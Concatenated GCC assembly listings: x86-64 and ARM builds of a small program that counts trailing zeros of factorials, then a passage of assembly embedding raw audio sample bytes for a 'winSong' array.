.file "148791.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%ld\n" .LC1: .string "%ld" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax jmp .L2 .L5: mov QWORD PTR -16[rbp], 5 mov QWORD PTR -24[rbp], 0 jmp .L3 .L4: mov rax, QWORD PTR -32[rbp] cqo idiv QWORD PTR -16[rbp] add QWORD PTR -24[rbp], rax mov rax, QWORD PTR -16[rbp] sal rax, 2 add QWORD PTR -16[rbp], rax .L3: mov rax, QWORD PTR -32[rbp] cmp QWORD PTR -16[rbp], rax jle .L4 mov rax, QWORD PTR -24[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT .L2: lea rax, -32[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT cmp eax, -1 jne .L5 mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L7 call __stack_chk_fail@PLT .L7: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "148791.c" .text .global __aeabi_idiv .section .rodata .align 2 .LC0: .ascii "%ld\012\000" .align 2 .LC1: .ascii "%ld\000" .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 ldr r3, .L8 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 b .L2 .L5: mov r3, #5 str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-16] b .L3 .L4: ldr r3, [fp, #-20] ldr r1, [fp, #-12] mov r0, r3 bl __aeabi_idiv mov r3, r0 mov r2, r3 ldr r3, [fp, #-16] add r3, r3, r2 str r3, [fp, #-16] ldr r3, [fp, #-12] lsl r3, r3, #2 ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] .L3: ldr r3, [fp, #-20] ldr r2, [fp, #-12] cmp r2, r3 ble .L4 ldr r1, [fp, #-16] ldr r0, .L8+4 bl printf .L2: sub r3, fp, #20 mov r1, r3 ldr r0, .L8+8 bl __isoc99_scanf mov r3, r0 cmn r3, #1 bne .L5 mov r3, #0 ldr r2, .L8 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L7 bl __stack_chk_fail .L7: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L9: .align 2 .L8: .word .LC2 .word .LC0 .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "681112.c" .intel_syntax noprefix .text .globl winSong_sampleRate .section .rodata .align 4 .type winSong_sampleRate, @object .size winSong_sampleRate, 4 winSong_sampleRate: .long 11025 .globl winSong_length .align 4 .type winSong_length, @object .size winSong_length, 4 winSong_length: .long 156800 .globl winSong_data .align 32 .type winSong_data, @object .size winSong_data, 156800 winSong_data: .ascii ")>5713&,\"\025\021\n!\b\022\032\013\027AJ\366\016*,\327\324\017" .ascii "\002\374\255\334\t\364\373\036\020A\022\016'\300\336\261\024" .ascii "\022\274\310\300\336+\037\302\354\357\032^I\b0\035\356\377\006" .ascii "\355\353\352\307\327\275\346\354\306\304\317\301\303\346\332" .ascii "\317\357\346\340\372\362\376\374\334\324\273\310\325\257\313" .ascii "\321\356\027\020\016$\020\017\b\371\005\025\022\367\030\r\016" .ascii "\035&*9PZX<MXRSC&+7\025\035\032\0370/;GNK9 1-(\030\016\"/\025" .ascii "\r\001\346\375\367\336\332\364\354\356\355\341\360\353\350\275" .ascii "\227\236\263\271\253\266\272\303\313\277\304\335\354\376\372" .ascii "\350\003\0302*\020\025" .string "\016\n\365\363\376\006\r\017\022#)0$\025.( \t\021\031\023\016\375\371\376\017\021\006\002&\036*&\006 \026\021\021\004\375\372\345\336\347\370\b\356\350\331\350\352\347\346\341\376\365\003\005\371\373\370\332\302\276\275\303\255\262\267\324\345\353\353\336\355\345\333\340\335\333\352\321\312\325\340\362\360\363\364\016\037\034\032\036&0&\017\020\026\031\007\004\020\0331028MTIEDQH@DPXY<030=+\"#78+-29\033\356\314\322\324\340\327\311\333\345\355\341\337\355\003\005\377\002\017'/\033\002\374\365\351\320\305\316\322\331\316\315\334\347\346\340\334\336\347\334\307\274\311\304\301\265\254\301\311\311\310\321\334\366\364\354\357\365\004\377\360\341\351\344\346\342\343\372\001\004\365\363\377\021\020\f\026&:9606- \016\372\007\001\370\366\376\02532).-3-\036\024\035\024\f\002\372\f\020\t\003\r\031( \026\031 \"\021" .string "\357\371\364\347\334\327\354\356\355\353\366\002\020\007\373\002\377\b\376\372\001\021\007\370\353\343\361\354\345\340\353\370\013\003\373\b\003\362\316\270\264\310\311\305\314\321\351\363\362\367\r 30/HU`O>8:,\031\021\r\036\036\025\022\"-3* *'!\021\005" .string "\007\374\352\347\350\372\373\362\361\003\013\017\005\371\007\004" .string "\354\334\332\335\325\307\312\316\335\324\310\305\320\331\336\331\325\354\363\366\353\342\343\344\321\271\265\257\270\264\257\270\323\344\355\355\345\372\374\367\354\346\353\361\347\327\337\346\366\367\364\373\023!\037\035\031,,!\023\017\023\030\020\377\006\017\036\036\034%:D@>:JKGCELL=&(*0'\037'8?86,/\032\371\341\334\344\352\344\331\353\365" .string "\001\001\020&0-36MN;)\037\032\020\374\346\356\355\357\347\341\347\366\372\354\353\347\362\353\327\311\312\310\301\267\250\265\275\302\275\274\310\334\337\321\324\324\337\331\310\273\274\300\274\267\255\276\306\310\276\275\312\332\340\331\344\355\002\002\366\357\361\362\345\325\305\323\327\331\330\342\372\021\032\025\037$3/\037\033\"$\033\023\n\036''&,<LNAHLSI7/75( \026).,*/<IH9AEMF;8>9%\030\t\026\026\r\005\n\027 \033\t\n\377\362\326\276\267\276\301\271\267\270\320\331\331\333\350\375\013\r\n\035%+\036\b" .string "" .string "\365\341\326\315\335\333\321\317\327\342\353\346\333\347\347\350\332\312\310\317\310\271\271\270\311\315\312\314\331\344\356\353\342\357\360\360\343\327\326\335\332\320\324\323\342\343\335\334\347\364\373\373\372\016\024\030\016\006\005\005\373\352\346\341\357\357\357\370\f\035')(8:;1)*.&\034\035\034,)',8@DA:FC@4++-!\024\026\023\037\033\030\035',/-&553,('%\025\007\005\376\003\373\367\370\002\004\002\372\355\355\332\312\271\263\264\270\264\263\273\301\321\322\327\342\364\376\006\013\023#\037\033\017\007" .string "\374\354\341\337\333\341\330\327\334\346\347\352\347\347\361\351\346\334\330\326\330\313\311\316\316\331\325\330\340\353\355\362\360\360\371\362\355\346\345\345\350\337\337\344\344\351\345\346\353\366\370\377" .string "\006\023\017\r\007\005\377\373\355\350\351\351\362\362\372\007\030\036&(/832--**\037 \"#*&*1:8<9<@96/,((\030\031\031\030\035\030\034\")'-)/610+(!\034\013\t\006\001\001\374\374\377\003\374\372\355\346\336\315\303\275\275\273\277\272\303\310\317\331\334\346\362" .string "\004\020\023\036 \032\024\f\006\375\366\346\346\340\337\336\331\334\342\345\343\351\345\353\350\341\336\331\325\324\321\306\315\314\317\322\322\327\337\343\343\352\345\353\351\344\341\340\336\336\336\326\336\333\335\336\336\340\350\354\356\367\365" .string "" .ascii "\374\370\366\361\353\346\335\343\340\347\354\364\375\f\025\032" .ascii "$%0.-++('$\037%\"((*/879=:B<:74//'!& $#&)205:8A>=97-+\037\030" .ascii "\031\021\022\016\016\r\021\n\006\377\363\356" .string "\341\330\321\322\316\322\320\324\334\337\350\355\366\376\r\022\034\"&+$ \031\023\b\003\365\361\355\347\350\344\344\346\354\347\355\352\352\353\343\340\334\327\321\322\310\312\312\311\315\315\320\325\333\326\337\334\334\335\330\326\324\322\317\322\311\315\314\313\314\315\317\322\330\327\340\337\343\344\341\335\333\327\317\316\305\312\312\317\325\336\346\362\374\001\r\r\026\030\026\025\026\024\022\022\r\023\020\023\027\031\034$&'.*0/,**#\" \031\035\032\035\036\"$-/198?>=:90.(\037 \033\033\030\032\030\033\025\021\016\002\375\363\356\347\347\343\350\347\351\363\365\377\005\017\027%*5;=C?:4/%\"\025\020\016\006\006\004\004\004\n\006\n\b\005\007\001\374\367\365\354\355\346\344\345\342\345\346\350\351\361\355\361\360\356\357\353\350\346\345\336\341\332\331\331\327\327\326\330\332\337\334\342\341\342\342\336\332\326\321\311\312\301\304\305\310\316\325\335\346\361\362\377" .string "\004\b\006\004\005\003\376\001\371\375\375\374\377\003\003\007\r\n\022\017\021\022\017\013\013\b\001\002\373\375\374\375\376\003\004\t\020\017\030\027\033\033\032\027\026\020\n\t" .string "\001\375\375\374\374\372\373\372\362\361\346\342\333\326\321\321\316\320\325\323\335\343\353\363\375\005\023\034!..230*(\037\031\026\013\r\b\006\005\t\006\013\f\013\017\013\013\t\006" .string "\001\372\372\367\360" .ascii "\374\357\363\352\366\n\354\337\357\373\013\370\020\007\004\023" .ascii "\006\002\366\371\001\377\371\020\013\016\r\013" .string "\366\026\"\377\005\003\343\334\326\272\333\313\341\346\344\375\377\b\371\004\r\0371.+@4\"\020\0133\036%5/@(53,*,&\0348\016\004\006\003\373\013\377\020\026\342 \033\006\025\027#!#'\034 \016\375\b\004\021\035\" \n\033\013\366\363\347\343\335\353\340\331\323\277\256\261\273\312\331\333\345\332\351\361\346\f\006\013\037\036&\036\f\r\b\002\t\016\024\013\020\r\370\350\366\370\362\373\002\362\365\375\357\330\272\305\277\276\312\321\332\313\321\311\306\324\315\350\361\341\357\356\337\340\321\334\347\343\366\360\357\355\344\351\342\342\370\370\362\354\354\334\310\312\265\266\273\306\325\314\332\340\337\340\353\361\376\r\033\026\027$\f\032\016\026%\032'20,'\035&$./4/\"\027\013\006\377\b\006\004\n\025\b\005\002\002\t\n \"..)'\037\037\032\037&#,,\030$\031\004\017\004\002\002\372\363\346\333\321\325\321\332\333\343\361\364\357\372\004" .string "\022\034/3C>44-+ )+')(\036$\033\023!\026\035%\030\027\013\366\363\360\345\354\355\355\352\355\346\344\350\346\363\361\370\007\006" .string "" .string "\370\365\363\373\001" .ascii "\t\006\t\005\002\002\372\003\376\377\b\371\370\354\330\321\313" .ascii "\311\320\322\323" .string "\331\340\341\342\357\356\373\006\021\027\033!\036\033\027!\034&+.+))!%\035%%%($\037\024\006\003\376\367" .string "\375\371\375\372\370\366\365\367\004\b\t\024\026\023\022\r\006\b\005\r\017\016\021\b\001\373\371\357\357\355\350\344\334\324\313\302\272\271\271\303\306\317\330\327\336\342\353\363" .string "\t\024\034\034\034\027\024\n\r\b\013\r\r\017\006\005\376\375\373\001\001\377" .string "\366\355\346\336\323\322\316\322\324\324\325\316\321\314\315\321\327\340\347\354\354\352\346\345\344\346\346\355\366\363\365\365\360\351\352\351\351\356\356\351\342\332\321\312\301\302\302\305\313\316\325\326\331\334\346\356\371\b\021\025\033\033\025\032\025\033!\")*+'# \036$*))#\034\020\n\003\002" .string "\002\006\001\002" .string "\376\374\002\006\017\032\035\"\"\035\027\031\022\026\032\032!\035\031\024\r\002\003\377\375\375\370\365\352\342\327\325\316\322\331\336\347\353\361\364\371\376\t\022\035*152/)(#%*(,($\037\033\025\030\027\031\036\031\025\r\005\370\364\355\355\360\356\363\357\354\350\350\344\353\361\367" .string "\002\007\006\003\375" .string "\376\002\n\n\017\f\006\004\001\371\377\377" .string "\003\375\371\360\346\333\330\323\324\333\335\343\344\346\350\355\360\374\007\021\037$'((#%&(1253/)($)*,2,(\037\026\r\t\003\005\007\004\006\003\377\374\376\375\005\f\022\034\033\034\031\025\017\021\017\022\030\026\030\023\f\003\377\367\366\365\362\362\351\343\332\321\311\312\311\315\325\331\340\342\346\351\357\365\002\016\026 \"!\036\033\025\026\025\027\034\031\032\024\017\b\006\002\005\b\007\t\002\374\362\352\341\337\333\334\337\334\335\330\325\322\324\324\334\343\350\361\360\360\356\354\350\355\356\362\367\366\367\363\356\350\351\345\350\352\350\351\341\332\321\312\301\302\301\304\312\313\320\321\325\327\340\346\361\376\005\016\022\023\022\022\020\025\026\032\037\035\035\032\030\024\025\024\030\032\032\032\024\016\006\001\371\371\365\366\370\365\366\363\361\360\364\367\377\005\t\016\f\013\b\007\003\006\006\b\n\006\004\377\371\363\362\353\352\351\344\342\333\324\316\313\306\312\314\321\330\332\341\345\352\357\372" .string "\013\024\031\036\037\036\032\032\026\030\027\027\030\025\023\017\f\b\t\007\n\t\007\006" .string "\373\364\360\352\352\346\347\350\344\344\342\342\343\347\351\361\364\367\373\372\372\370\370\366\373\371\374\375\372\372\370\364\362\364\360\363\361\356\354\346\340\333\330\323\327\326\332\336\341\345\352\356\364\376\003\017\025\033 \"##$\"'&()(&%$#%$('%#\037\031\024\021\f\r\t\n\n\b\b\b\t\n\017\020\030\031\033\035\033\031\030\026\024\027\023\025\022\017\f\b\002\377\375\367\370\362\356\353\345\340\337\335\334\342\342\351\355\362\370\377\004\f\026\032#'+,,)(&#% !\037\035\032\030\026\025\026\023\026\021\020\f\b\002\377\373\370\370\363\366\363\363\362\364\363\366\371\373\001" .string "\004\004\003\001\002" .string "" .string "\001\377\001\376\375\374\373\367\370\367\364\365\360\356\351\345\340\337\333\333\336\336\344\346\353\360\367\372\004\n\020\030\034 \"#\"$\"#$\"$#\"!!\037\" !\"\037\036\032\027\021\020\n\013\b\006\007\005\006\006\b\007\r\r\020\024\022\024\023\021\017\020\013\f\n\b\007\003" .string "\375\372\364\364\356\353\350\343\340\334\330\325\327\324\331\333\337\345\352\360\367\377\004\016\021\030\034\036\037\037\036\033\033\026\027\024\022\021\017\r\013\n\b\n\006\007\005\002\377\374\370\364\362\355\356\352\352\352\351\351\353\354\355\361\360\365\365\365\367\366\364\364\363\361\363\360\361\360\356\354\355\351\350\351\344\345\340\335\332\327\322\321\320\316\322\322\330\333\341\345\355\361\371\001\004\013\016\022\023\025\024\026\024\024\025\023\024\023\024\022\024\022\024\023\022\023\020\017\013\n\005\004\377\376\375\372\374\374\374\374\377\376\003\004\005\b\007\007\007\006\002\004\377\377\376\373\373\370\365\362\360\352\351\344\340\336\330\326\323\320\315\320\315\321\324\330\337\344\353\362\372\376\b\f\021\025\026\030\027\026\024\024\017\020\r\013\n\t\b\007\006\003\005\002\002" .string "\375\373\370\365\362\360\353\355\352\351\352\352\352\354\355\356\362\361\364\365\365\365\365\363\362\363\357\362\357\357\357\356\353\354\352\347\350\343\343\337\334\331\327\323\321\322\320\324\325\332\337\345\351\361\367\374\005\007\016\021\024\025\027\026\027\027\025\027\025\026\025\026\025\027\025\026\027\024\025\023\022\016\r\t\b\005\002\004\001\002\002\003\003\006\006\t\013\n\r\f\f\013\013\007\b\005\003\004" .string "\377\375\373\367\366\361\356\354\346\344\340\334\331\330\324\326\327\331\336\341\350\356\365\373\004\b\017\025\030\035\036 \037\037\034\034\031\027\026\024\023\021\021\017\020\r\016\f\n\t\007\004\001\377\373\373\367\366\367\365\366\366\367\367\373\371\375\376\376" .string "\377\377\376\377\373\376\371\373\371\370\367\366\361\356\355\352\353\352\352\354\356\355\357\356\357\357\361\356\365\360\370\365\374\365\377\362\020\020\355\372\332\347\026\356\375,\304+FN7$\024\326\b\n\343\003\037\025\030\276\005\305\263\262\305'\350\330\362\362\021L\371\275\331\346\037)\007\002\370\371\351\364\365\b\030\002\f\t\374\020\353\313\276\307\272\315\303\251\312\325\331\337\002\343\017\352\354\372\315\354\303\275\300\312\356\351\340\331\346\352\364\370\001%0/:-\036;\"($)CE\037\0210,3-+2TG=WPUF7C@J3\377\032\f\r\036\036MMLF7\035\031\033\002\347\362\376\354\327\270\323\316\303\273\237\247\320\354\320\340\361\340\335\330\274\334\345\302\337\305\316\373\023&\372\r\r\n!\n\017\"+\037\037\"\r\b\013\331\357" .string "\365\004\006\030.(\035\036\03651\033\002\027\026\376\005\362\362\033\035 \033\034 \t\035\025):\021\366\337\325\342\325\306\316\342\351\355\004\016\016\026\022\367\345\336\352\324\274\272\313\321\326\330\252\302\323\320\343\351\343\001\376\343\361\354\020\377\361\377\373\n\370\340\004\374" .string "\034\374" .string "\022\035\021\036-2<M953-+\022 5/-RT`q[>G<FH,)\033%\030\007\f\f\003\347\320\341\367\b\021\r\t\035\034\006\371\362\001\365\344\346\364\t \030\013\007\b\t\373\364\365\370\367\370\324\350\336\307\324\267\311\312\313\306\275\313\333\341\343\333\341\001\345\322\326\325\327\317\322\311\312\344\363\361\335\347\373\374\374\001\003\024\036\002\357\365\374\364\345\341\362\025\033%#%@90( )\032\004\003\377\030!\b\001\027\037\025\"\030\020&1345B0 \034\016\021\003\001\354\376\032\360\374" .ascii "\005\022\013\r\023\021\032\023\001\002\354\002\363\340\347\333" .ascii "\347\356\374\002\031)\021\016\022\021\017\004\351\324\337\346" .ascii "\356\330\322\324\311\265\252\267\307\361\341\351\b\002\022\b" .ascii "\357\377\007\013\026\f\032(.753I>7=035\"\022\033\027\030\032" .ascii "\013\002\372\371\376\374\377\020\034\006\022\033\032$\r\001\004" .ascii "\373\365\364\336\351\370\365\362\331\361\374\375\005\363\004" .ascii "\003\374\350\324\332\326\323\314\275\304\332\333\325\325\347" .ascii "\367\372\355\342\341\333\342\325\276\327\327\317\325\310\317" .ascii "\343\335\331\331\350\n\b\005\374\005\021\021\t\003\006\025\005" .ascii "\350\351\371\004\366\376\001\f$1%\037+>'$$'(\017\025\002 3#5" .ascii "<BeRFBBI71\"-'\035\005\376\375\361\355\325\334\374\016\n\016" .ascii "\023\027\037\026\023\036\036-\"\013\031%3(\030!\034/#\013\031" .ascii "\n\032\n\365\376\370\367\342\310\313\315\322\323\276\317\326" .ascii "\327\324\333\334\336\351\333\323\330\324\316\276\256\270\263" .ascii "\276\306\274\274\323\337\334\333\345\344\353\334\303\324\316" .ascii "\307\306\266\277\322\326\346\334\361\373\363\362\346\366\001" .ascii "\361\355\362\357\366\375\366" .string "\346\366\007\016\017\024#/++*2=D8-6/,%\031\0323'\"*2DC@;HLD>5&33\026\026'.3<8BOF1-2A0\033\032\r\021\n\374\324\334\332\267\274\266\310\351\336\336\355\360\007" .string "\374\363\356\377\370\355\376\n\006\017\003\365\004\b\003\362\361" .string "" .string "\371\351\343\323\325\316\275\274\302\306\265\277\276\312\344\325\322\341\344\356\352\325\332\327\331\317\301\317\310\321\314\300\323\343\344\360\357\362\375\007\370\330\350\335\341\331\323\352\355\373\371\366\364\007\r\002\004\003" .string "\t\b\372\022\020\007\f\003\n\033# &49?:?PD877.4.!'*-(\035$4)2437<5!0! \033\t\032%\037'$\0352,#\034!\"\022\t\377\377\004\375\337\326\323\302\263\256\252\261\312\315\335\343\355\370\356\361\351\361\366\371\366\360\001\b\001\005\374\375\b\373\375\373\366\375\361\343\343\343\342\327\316\314\310\307\306\307\310\321\333\332\337\350\351\357\344\333\336\332\343\334\323\324\326\333\322\333\334\342\367\352\361\376\365\374\371\351\343\347\351\347\345\347\355\371\370\363\374\t\003\002\001\372\377\005\006\375\004\r\024\025\025\030\032\034\027\035#/7/3=6@?1:5-2! ($!#*+22)*53-('%#\"\032\033\036 \034\036*,)' \037\027\031\017\004\006\372\366\352\323\314\307\270\266\267\277\313\323\331\333\345\356\353\366\366\364\377\373\376\374\006\006\002\007\001\004\003\004" .string "\365\365\362\354\354\343\343\340\327\324\312\320\315\312\317\320\316\331\331\325\335\327\340\340\335\336\332\334\325\320\316\316\320\322\325\325\336\346\343\347\353\353\347\343\351\347\340\350\344\335\340\346\351\344\355\350\350\366\351\356\365\354\371\376\373\007\013\005\r\f\r\023\033\033\030%)((./59:7582.((\037)*&/02,02385/40+-&''.2.5/2.',,' \033\023\f" .string "\373\350\333\330\322\316\313\325\326\331\343\353\361\373\376\377\377\b\n\f\024\f\023\031\020\023\022\016\f\n\005\001" .string "\001\374\365\357\350\347\343\340\326\331\331\325\325\324\326\324\331\326\326\334\335\334\333\333\333\324\323\321\316\315\313\311\314\312\313\331\324\326\331\330\334\332\326\322\317\321\313\316\323\313\320\325\320\315\321\326\323\320\326\335\343\346\353\347\360\363\361\367\370\377\003\002\005\t\r\024\023\030\034\036&&\"\"\036\033\036\031\030\031\031\030\025\031\034\037\"))*-+(%' !#(*.2-0/3/+/&)$\030 \022\t\006\367\360\350\343\336\335\342\345\361\371\373\006\f\f\022\027\035\037#-+.13-&+%\"#\"\035\026\030\022\013\r\002\002\002\370\374\367\361\364\360\356\362\356\362\364\363\365\357\361\360\357\357\354\351\345\345\341\335\340\341\336\343\352\352\352\353\355\343\341\336\335\335\330\327\320\324\323\316\325\321\314\323\321\324\326\325\334\334\342\346\352\356\356\362\361\362\364\367\370\370\377\004\004\n\r\r\017\013\f\t\b\b\005\002\377\377\377\374\003\003" .string "\t\002\007\013\006\f\n\005\n\b\007\n\007\n\b\n\013\013\022\021\020\016\f\013\005\004\004\374\370\367\360\350\337\326\316\311\311\307\314\322\331\331\341\353\357\375\375\003\013\016\024\031\033 \037\037 \035\036\031\025\r\006\006\005\005\004\n\t\n\t\r\b\013\013\f\r\f\021\020\024\017\020\371\022$\"\006\356\356\373\355\341\013\360\020\034\f\n\355\353\377\013\363V\b\350J\315'\370\324\353\324\037!?" .string "\005\r\005\372\317\341\016\272\316\306\211\327\243\305\355\352\365\034\023\016\037*\"\r=9W/9\025\330\341\310\312\305\373\354\326\361\355\001\017\002\023\r\360\t\370\341\317\240\330\331\322\006\353\352\360\335\372\n\020+\032*1=+\031\026\024,\031'L@%A\022\030\023\371#\371\366\356\370\355\326\304\255\332\335\333\361\346\347\f\351-@6nJ:8;%+\016\024\365\367\020\013#\n\016\327\362\357\367\024\030\022\024&\371\031\366\311\254\313\325\326\367\335\370\350\376\005\362\023\375\365\b\f\t \372\005!\013'=2 :\b\021+\032\034\006\370\004\364\324\352\275\251\243\251\262\322\342\323\373\317\346\374\367\352\357\n\367\371\346\353\277\264\265\255\321\356\353\377\021\3763)9K3Q-1*\030\013\374\376\375\016\033\n\353\376\332\375\371\352\372\372\334\321\367\344\t\325\343\335\331\375" .string "\021\023 \375\035\025\"9\025\0317\037\013(\033\022\005\016\023D=\030K0X\\Y[E5( \363\006\323\320\266\257\312\347\306\276\307\217\302\275\351\343\366\374\004\013\001\020\352\372\003\021\017#2=*.0\0350.\037\n\"\036\024\022\367\371\357\367\376\f\367\364\360\321\354\334\330\341\330\277\337\302\273\306\232\261\260\302\313\335\325\342\360\347\003\001\013\035\025\017\037\b\007\372\306\311\305\335\360\017\001\007/\017<8,2#\022\017\b\351\357\321\334\344\352\347\353\344\327\347\327\352\331\345\351\350\344\364\005\001" .string "\352\377\004\017\">--9#A.+?\035\0353!\024\034\006\006\017\026\"*\020\03649OHB5)\022\035\366\352\331\265\266\261\317\317\321\310\262\245\270\312\327\370\370\371\370\r\005\375\b\353\371\n&%8*:#\032E\";\035&\023\026\t\376\004\367\005\367\025\016\034\001\375\370\350\006\350\366\335\323\314\314\301\255\301\226\253\261\303\305\330\327\326\332\335\004\366\006" .string "\t\367\377\352\341\325\275\330\324\353\376\001\b\036\021 21, )\r\020\376\367\374\351\354\375\002\003\t\360\370\353\355\373\376\006" .string "\363\356\365\346\365\351\327\352\373\374\023\027\004\017\017\017&'\024\027\022\002\r\373\372\367\364" .string "\f\"1AB\\IWa\\`EB3/\030\016\365\361\361\354\371\357\345\302\311\300\323\357\361\372\364\375\353\373\362\351\336\326\352\367\003\023\030\367\372\372\t\375\374\006\366\366\355\371\354\356\353\352\365\b\032\025\035\n\024\t\016\034\021\021\006\370\351\372\363\336\334\331\315\364\372\365\n\353\365\370\006\021\f\004\370\363\334\340\305\277\257\237\260\266\303\331\335\312\343\327\353\377\361\350\326\340\340\356\345\341\341\344\363\004\016\016\024\001\020\025)(%$\024\031\0225',\025 11<CR(9:@?9!\022\007\376\006\356\353\345\341\360" .string "\013\025\030\026\")10-\024\t\004\352" .string "\347\317\310\320\326\335\320\312\312\270\320\322\356\001\007\004\f\n\024$\023\031\022\"+7E=/+<4,!\037\023\002\377\365\r\370\360\371\354\377\020\013\f\006\361" .string "\365\377\373\353\332\322\307\277\310\257\273\252\266\305\321\334\327\336\331\352\371\374\372\366\354\342\331\325\324\303\274\270\274\316\337\351\361\370\361\n\t\027\024\017\001\b\r\375\031\373\b\006\f \033\026!\030\034/!*)%\022\034\f\013\023\001\007\003\n\026\036\032!\026\020 \032\032\034\007\371\373\350\347\353\324\341\331\330\372\005\n\034+'22D@.\032\030\017\005\b\356\361\352\353\355\360\344\344\336\337\363\371\t\013\r\013\035\020\026.\024\030\"#7<:<-20#(\"\022\371\002\362\356\353\333\342\340\351\357\371\356\372\346\345\361\334\355\342\331\320\303\276\314\303\257\265\270\311\310\321\345\353\337\345\365\367\376\373\375\362\353\342\333\323\307\316\322\332\345\363\362" .string "\372\001\024\021\017\016\017\377\n\366\376" .string "\003\b\b\025\r#\026)\033\033. ) \034\026\022\002\013\b" .string "\n\n\022\026 \031\"\031\026\035\026\033\022\t\360" .ascii "\353\346\343\335\350\341\361\376\017\n'\"'7&!" .string "#\030\n\n\366\363\361\351\352\351\345\345\343\331\337\332\340\363\366\001\f\f\b\023\017\024\020\036+(5>C@B6'+'\035\"\006\006\005\354\374\365\354\357\362\373\004\005\372\001\362\364\365\355\352\344\337\320\326\304\302\301\271\301\304\305\330\333\325\363\342\337\350\357\362\357\346\332\340\310\310\312\300\300\315\330\342\344\336\355\343\352\363\361\363\364\363\360\371\354\372\371\372\b\017\030 *\0340#&)362)\0342\033\036\024\023)-)732B-.1)'#\024\r\b\372\374\366\367\373\006\016\031!\034*!%$\031\023\027\006\375" .string "\334\343\324\313\320\321\316\316\311\300\312\301\313\327\340\347\355\350\360\365\352\376\002" .string "\021\037\"0/).$($\037\030\027\r\005\b\371\373\370\375\377\006\016\034\034\021\033\t\n\003\n" .string "" .string "\373\364" .string "\342\352\343\341\350\364\366\374\373\377\377\366\006\006\006\376\376\355\342\332\317\320\305\310\314\325\327\337\337\332\342\322\334\334\331\333\341\326\330\331\320\332\337\350\360\372\365\r\375\376\004\002\016\007\007\005\021\001\r\007\372\005\005\f\017\033$*%)/$+((#$\031\024\024\007\020\n\024\037+/;<?D6@862.\035\024\016\373\376\375\361\361\357\356\356\335\346\345\335\357\355\361\373\374\372\375\374\372\003\005\017\025\"\037'!\027\034\016\020\n\005\375\377\354\353\345\332\340\335\342\345\357\351\361\360\353\347\343\344\351\351\334\345\326\325\320\303\315\311\323\340\347\342\355\356\355\357\356\366\364\371\365\374\353\345\341\325\331\326\336\345\363\356\370\362\360\366\357\366\366\371\371\002\367\376\374\365\003\007\021\035##1(&,&-0*'&\033\030\020\020\030\027 &-'0* &\034\"!\030\025\030\003\007\001\367" .string "" .string "\n\017\033\030%\033\033\034\026\030\024\020\t\b\364\363\343\333\334\325\321\323\316\307\324\310\307\311\314\332\336\335\353\353\347\362\355\362\373\013\027\026!\"'\"\033\030\022\022\022\021\b\r\373\373\363\360\370\367\376\005\013\005\016\002\004\003" .string "\001\003" .string "\376\375\357\357\353\336\343\375\372\370\020\020\030\007\032\022\361\013\365\352\356\334\273\334\325\350\367\003\007\003\023\350\027\350\367\355\275\006\326\276\335\307\274\352\334\334\001\003\023\030\027\f,1&\026\002\024\022\005\376\367\350\006\377\366\006\0370/\034\0303\035!\023\370\001\003" .string "\375\335\356\004\333\353\001\021,!$*0-)'\n\004\t\003\354\375\375\374\356\360\353\354\002\350\332\325\364\355\342\337\350\356\365\346\342\355\364\017\364\b\[email protected]@\032\025\032\031\002\007\t\006\r\373\370\005\032$$\017\033!\r\017\366\353\377\367\330\323\332\342\357\330\345\361\363\030\007\r\"\021\022\001\341\374\362\343\331\316\317\321\326\274\302\333\371\370\372\361\355\361\350\323\276\317\320\310\271\306\311\331\347\334\351\374\026\031%\027%#\033\r\361\021\005\376\371\360\357\001\365\360\004\016'13$4'\032\n\363\002\022\b\365\363\365\n\003\374\005!/43-H6&\031\005\033\026\007\002\350\353\376\352\354\361\375\016" .string "\367\364\002\361\345\331\332\353\366\354\340\357\357\t\376\t\031/EME=RA3\027\026\031!\004\366\371\366\375\347\367\006\026,'\016\027\030\017" .string "\344\351\365\363\332\324\327\325\334\326\326\355\006\025\017" .string "\013\017\005\363\344\343\350\355\322\306\305\313\320\305\314\334\366\373\361\346\356\352\344\325\277\315\322\327\306\300\307\327\341\330\345\b\035\037'\025 %\033\021\376\b\024\r\363\364\363\372\002\371\377\03656/\036($\037\r\377\017\020\004\363\356\360\003\372\375\n\0374;7';6)\025\021\031\026\n\362\356\350\366\356\343\352\005\016\006\376\353\373\363\351\334\332\347\361\347\333\342\351" .string "\001\004\0305EG=7G?,\037\032\034\035\004\355\356\364\373\364\371\006 &\"\025\n\032\r\370\355\356\357\366\344\315\320\326\344\342\340\360\b\024\021\006\b\016\t\373\354\355\355\356\325\307\311\314\330\320\322\340\371\374\367\353\344\360\342\325\313\317\324\331\305\275\307\320\341\341\352\377\036!\037\031\036)\037\023\005\r\017\r\366\354\360\365" .string 